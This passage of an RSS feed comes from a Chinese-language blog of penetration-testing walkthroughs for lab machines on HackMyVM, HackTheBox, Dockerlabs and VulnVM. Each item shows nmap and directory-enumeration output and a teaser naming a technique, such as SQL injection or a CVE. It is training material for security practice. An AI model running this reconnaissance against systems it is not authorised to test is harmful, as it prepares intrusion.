&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Ubuntu Linux&lt;span class=&#34;p&#34;&gt;;&lt;/span&gt; protocol 2.0&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; ssh-hostkey: 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;   &lt;span class=&#34;m&#34;&gt;256&lt;/span&gt; 62:ff:f6:d4:57:88:05:ad:f4:d3:de:5b:9b:f8:50:f1 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;ECDSA&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_  &lt;span class=&#34;m&#34;&gt;256&lt;/span&gt; 4c:ce:7d:5c:fb:2d:a0:9e:9f:bd:f5:5c:5e:61:50:8a &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;ED25519&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;80/tcp open  http    nginx 1.24.0 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Ubuntu&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_http-server-header: nginx/1.24.0 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Ubuntu&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_http-title: Edukate - Online Education Website
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;code&gt;80&lt;/code&gt;端口没有什么可以利用的东西，尝试爆破子域名&lt;/p&gt;</description>
    </item>
    <item>
      <title>HackMyVM-Pycrt</title>
      <link>https://www.hyhforever.top/posts/2025/05/hackmyvm-pycrt/</link>
      <pubDate>Sun, 11 May 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/05/hackmyvm-pycrt/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/pycrt  
❯ nmap 192.168.55.36 -sV -A -p- 

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.62 (Debian)
6667/tcp open  irc
| irc-info: 
|   users: 1
|   servers: 1
|   chans: 0
|   lusers: 1
|   lservers: 0
|   server: irc.local
|   version: InspIRCd-3. irc.local 
|   source ident: nmap
|   source host: 192.168.55.4
|_  error: Closing link: (nmap@192.168.55.4) [Client exited]
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;code&gt;80&lt;/code&gt;端口没有可以利用的信息，只是一个静态页面&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Environment</title>
      <link>https://www.hyhforever.top/posts/2025/05/htb-environment/</link>
      <pubDate>Wed, 07 May 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/05/htb-environment/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Environment  
❯ nmap Environment.htb -sV -A

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey: 
|   256 5c:02:33:95:ef:44:e2:80:cd:3a:96:02:23:f1:92:64 (ECDSA)
|_  256 1f:3d:c2:19:55:28:a1:77:59:51:48:10:c4:4b:74:ab (ED25519)
80/tcp open  http    nginx 1.22.1
|_http-title: Save the Environment | environment.htb
|_http-server-header: nginx/1.22.1
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;dirsearch&#34;&gt;Dirsearch&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Environment  
❯ dirsearch -u http://environment.htb 

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                
 (_||| _) (/_(_|| (_| )                                                                                                                         
                                                                                                                                                
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289

Target: http://environment.htb/

[07:23:08] Scanning:                                                                                                                            
[07:23:23] 403 - 555B - /admin/.config                                    
[07:23:23] 403 - 555B - /admin/.htaccess
[07:23:39] 403 - 555B - /administrator/.htaccess                          
[07:23:43] 403 - 555B - /admpar/.ftppass                                  
[07:23:43] 403 - 555B - /admrev/.ftppass
[07:23:46] 403 - 555B - /app/.htaccess                                    
[07:23:52] 403 - 555B - /bitrix/.settings.bak                             
[07:23:52] 403 - 555B - /bitrix/.settings
[07:23:52] 403 - 555B - /bitrix/.settings.php.bak                         
[07:23:54] 301 - 169B - /build  -&amp;gt;  http://environment.htb/build/         
[07:23:54] 403 - 555B - /build/                                           
[07:24:15] 403 - 555B - /ext/.deps                                        
[07:24:15] 200 - 0B - /favicon.ico                                      
[07:24:26] 200 - 4KB - /index.php                                        
[07:24:26] 200 - 2KB - /index.php/login/                                 
[07:24:31] 403 - 555B - /lib/flex/varien/.project                         
[07:24:31] 403 - 555B - /lib/flex/uploader/.actionScriptProperties
[07:24:31] 403 - 555B - /lib/flex/varien/.flexLibProperties
[07:24:31] 403 - 555B - /lib/flex/varien/.actionScriptProperties
[07:24:31] 403 - 555B - /lib/flex/uploader/.flexProperties
[07:24:31] 403 - 555B - /lib/flex/uploader/.project
[07:24:31] 403 - 555B - /lib/flex/uploader/.settings
[07:24:31] 403 - 555B - /lib/flex/varien/.settings
[07:24:34] 200 - 2KB - /login                                            
[07:24:34] 200 - 2KB - /login/                                           
[07:24:35] 302 - 358B - /logout/  -&amp;gt;  http://environment.htb/login        
[07:24:35] 302 - 358B - /logout  -&amp;gt;  http://environment.htb/login         
[07:24:36] 403 - 555B - /mailer/.env                                      
[07:25:01] 403 - 555B - /resources/sass/.sass-cache/                      
[07:25:01] 403 - 555B - /resources/.arch-internal-preview.css
[07:25:02] 200 - 24B - /robots.txt                                       
[07:25:12] 301 - 169B - /storage  -&amp;gt;  http://environment.htb/storage/     
[07:25:12] 403 - 555B - /storage/
[07:25:19] 403 - 555B - /twitter/.env                                     
[07:25:21] 405 - 244KB - /upload/                                          
[07:25:22] 405 - 244KB - /upload                                           
[07:25:24] 403 - 555B - /vendor/                                          
                                                                             
Task Completed    
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;env-bypass&#34;&gt;Env Bypass&lt;/h2&gt;
&lt;p&gt;进入登录页，进行抓包，可以看到直接带出了报错信息&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dockerlabs-BaluFood</title>
      <link>https://www.hyhforever.top/posts/2025/05/dockerlabs-balufood/</link>
      <pubDate>Thu, 01 May 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/05/dockerlabs-balufood/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/balufood  
❯ nmap 172.17.0.2 -sV -A -p- 

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey: 
|   256 69:15:7d:34:74:1c:21:8a:cb:2c:a2:8c:42:a4:21:7f (ECDSA)
|_  256 a7:3a:c9:b2:ac:cf:44:77:a7:9c:ab:89:98:c7:88:3f (ED25519)
5000/tcp open  http    Werkzeug httpd 2.2.2 (Python 3.11.2)
|_http-server-header: Werkzeug/2.2.2 Python/3.11.2
|_http-title: Restaurante Balulero - Inicio
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;weak-pass&#34;&gt;Weak Pass&lt;/h2&gt;
&lt;p&gt;进入到&lt;strong&gt;172.17.0.2:5000/login&lt;/strong&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Eureka</title>
      <link>https://www.hyhforever.top/posts/2025/04/htb-eureka/</link>
      <pubDate>Tue, 29 Apr 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/04/htb-eureka/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Hard&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Eureka  
❯ nmap Eureka.htb -sV -A    

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d6:b2:10:42:32:35:4d:c9:ae:bd:3f:1f:58:65:ce:49 (RSA)
|   256 90:11:9d:67:b6:f6:64:d4:df:7f:ed:4a:90:2e:6d:7b (ECDSA)
|_  256 94:37:d3:42:95:5d:ad:f7:79:73:a6:37:94:45:ad:47 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://furni.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;添加&lt;strong&gt;furni.htb&lt;/strong&gt;到**/etc/hosts**&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dockerlabs-Gallery</title>
      <link>https://www.hyhforever.top/posts/2025/04/dockerlabs-gallery/</link>
      <pubDate>Sat, 26 Apr 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/04/dockerlabs-gallery/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Hard&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Gallery  
❯ nmap 172.17.0.3 -sV -A -p- 

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 19:95:1a:f2:f6:7a:a1:f1:ba:16:4b:58:a0:59:f2:02 (ECDSA)
|_  256 e7:e9:8f:b8:db:94:c2:68:11:4c:25:81:f1:ac:cd:ac (ED25519)
80/tcp open  http    PHP cli server 5.5 or later (PHP 8.3.6)
|_http-title: Galer\xC3\xADa de Arte Digital
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;feroxbuster&#34;&gt;Feroxbuster&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Gallery  
❯ feroxbuster -u &amp;#39;http://172.17.0.3/&amp;#39; -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt   
                                                                                                                                                
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben &amp;#34;epi&amp;#34; Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://172.17.0.3/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, txt]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200      GET       29l       83w     1478c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        7l       57w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      266l      543w     5288c http://172.17.0.3/style.css
200      GET       28l       63w     1104c http://172.17.0.3/login.php
200      GET        0l        0w        0c http://172.17.0.3/config.php
302      GET        0l        0w        0c http://172.17.0.3/dashboard.php =&amp;gt; login.php
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;sql-injection&#34;&gt;SQL Injection&lt;/h2&gt;
&lt;p&gt;在用户名这里存在注入点&lt;/p&gt;</description>
    </item>
    <item>
      <title>HackMyVM-Immortal</title>
      <link>https://www.hyhforever.top/posts/2025/04/hackmyvm-immortal/</link>
      <pubDate>Sat, 26 Apr 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/04/hackmyvm-immortal/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/immportal  
❯ nmap 192.168.55.17 -sV -A -p- 

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.55.4
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0        0             504 Feb 27  2024 message.txt
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 e8:79:ad:8b:d1:a8:39:1b:ac:ed:52:ef:d0:22:0e:eb (RSA)
|   256 65:df:6d:1d:49:11:bd:f3:2f:fa:10:0c:3b:48:69:39 (ECDSA)
|_  256 f6:b7:bf:cf:a5:d5:1b:26:4e:13:08:31:07:d5:79:b1 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Password
|_http-server-header: Apache/2.4.56 (Debian)
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;own-www-data&#34;&gt;Own www-data&lt;/h2&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2025/04/hackmyvm-immortal/images/image-151.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2025/04/hackmyvm-immortal/images/image-151.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>HackMyVM-Up</title>
      <link>https://www.hyhforever.top/posts/2025/04/hackmyvm-up/</link>
      <pubDate>Sat, 26 Apr 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/04/hackmyvm-up/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Diffculty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/up  
❯ nmap 192.168.55.16 -sV -A -p-

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: RodGar - Subir Imagen
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;进入之后是一个上传页面，经过测试没有漏洞&lt;/p&gt;
&lt;h2 id=&#34;feroxbuster&#34;&gt;Feroxbuster&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/up  
❯ feroxbuster -u &amp;#39;http://192.168.55.16/&amp;#39; -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt
                                                                                                                                                
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben &amp;#34;epi&amp;#34; Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.55.16/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, txt]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      278c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      150l      388w     4489c http://192.168.55.16/
301      GET        9l       28w      316c http://192.168.55.16/uploads =&amp;gt; http://192.168.55.16/uploads/
301      GET        9l       28w      319c http://192.168.55.16/javascript =&amp;gt; http://192.168.55.16/javascript/
200      GET      150l      388w     4489c http://192.168.55.16/index.php
403      GET       31l       94w      964c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET        1l        1w     1301c http://192.168.55.16/uploads/robots.txt
301      GET        9l       28w      329c http://192.168.55.16/javascript/clipboard =&amp;gt; http://192.168.55.16/javascript/clipboard/
200      GET      858l     3081w    26377c http://192.168.55.16/javascript/clipboard/clipboard
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;own-www-data&#34;&gt;Own www-data&lt;/h2&gt;
&lt;p&gt;注意到**/uploads&lt;strong&gt;下还有一个&lt;/strong&gt;robots.txt**，经过解码得到源码&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dockerlabs-Bicho</title>
      <link>https://www.hyhforever.top/posts/2025/04/dockerlabs-bicho/</link>
      <pubDate>Fri, 25 Apr 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/04/dockerlabs-bicho/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/bicho  
❯ nmap 172.17.0.2 -sV -A -p- 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-24 09:26 EDT
Nmap scan report for 172.17.0.2
Host is up (0.000089s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-title: Did not follow redirect to http://bicho.dl
|_http-server-header: Apache/2.4.58 (Ubuntu)
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;添加&lt;strong&gt;bicho.dl&lt;/strong&gt;到**/etc/hosts**&lt;/p&gt;</description>
    </item>
    <item>
      <title>HackMyVM-Mathdop</title>
      <link>https://www.hyhforever.top/posts/2025/04/hackmyvm-mathdop/</link>
      <pubDate>Thu, 24 Apr 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/04/hackmyvm-mathdop/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficult&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali  
❯ nmap 192.168.55.13 -sV -A -p-

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 ac:78:16:74:49:a1:68:9d:54:84:8a:59:e9:38:10:bc (RSA)
|   256 06:0c:4d:9d:2c:32:43:d2:3d:f7:4f:82:c8:15:85:60 (ECDSA)
|_  256 3b:cd:fc:1f:dd:48:0f:ee:17:78:9a:f1:09:cb:8c:ec (ED25519)
7577/tcp open  http    Apache Tomcat (language: en)
| http-title: Site doesn&amp;#39;t have a title (application/hal+json).
|_Requested resource was http://192.168.55.13:7577/api
| http-methods: 
|_  Potentially risky methods: PUT PATCH DELETE
9393/tcp open  http    Apache Tomcat (language: en)
| http-methods: 
|_  Potentially risky methods: PUT PATCH DELETE
|_http-title: Site doesn&amp;#39;t have a title (application/hal+json).
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;cve-2024-37084&#34;&gt;CVE-2024-37084&lt;/h2&gt;
&lt;p&gt;进入到&lt;strong&gt;9393&lt;/strong&gt;端口的&lt;strong&gt;dashboard&lt;/strong&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>HackMyVM-Atom</title>
      <link>https://www.hyhforever.top/posts/2025/04/hackmyvm-atom/</link>
      <pubDate>Tue, 22 Apr 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/04/hackmyvm-atom/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/atom  
❯ nmap 192.168.55.12 -sV -A -p-

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)
|_  256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;只有&lt;strong&gt;22&lt;/strong&gt;端口开放？有趣&lt;/p&gt;
&lt;p&gt;扫一下&lt;strong&gt;UDP&lt;/strong&gt;端口&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/atom  
❯ nmap 192.168.55.12 -sU --top-ports 100                                                                                                      ⏎

PORT    STATE SERVICE
623/udp open  asf-rmcp
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;ipmi&#34;&gt;IPMI&lt;/h2&gt;
&lt;p&gt;IPMI（智能平台管理接口）能够横跨不同的操作系统、固件和硬件平台，可以智能的监视、控制和自动回报大量服务器的运作状况，以降低服务器系统成本。&lt;/p&gt;</description>
    </item>
    <item>
      <title>VulnVM-Get</title>
      <link>https://www.hyhforever.top/posts/2025/04/vulnvm-get/</link>
      <pubDate>Tue, 22 Apr 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/04/vulnvm-get/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali  
❯ nmap 192.168.55.11 -sV -A -p- 

Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey: 
|   256 69:dc:67:49:10:2a:a4:26:a8:9f:c4:5d:a3:b8:a1:3e (ECDSA)
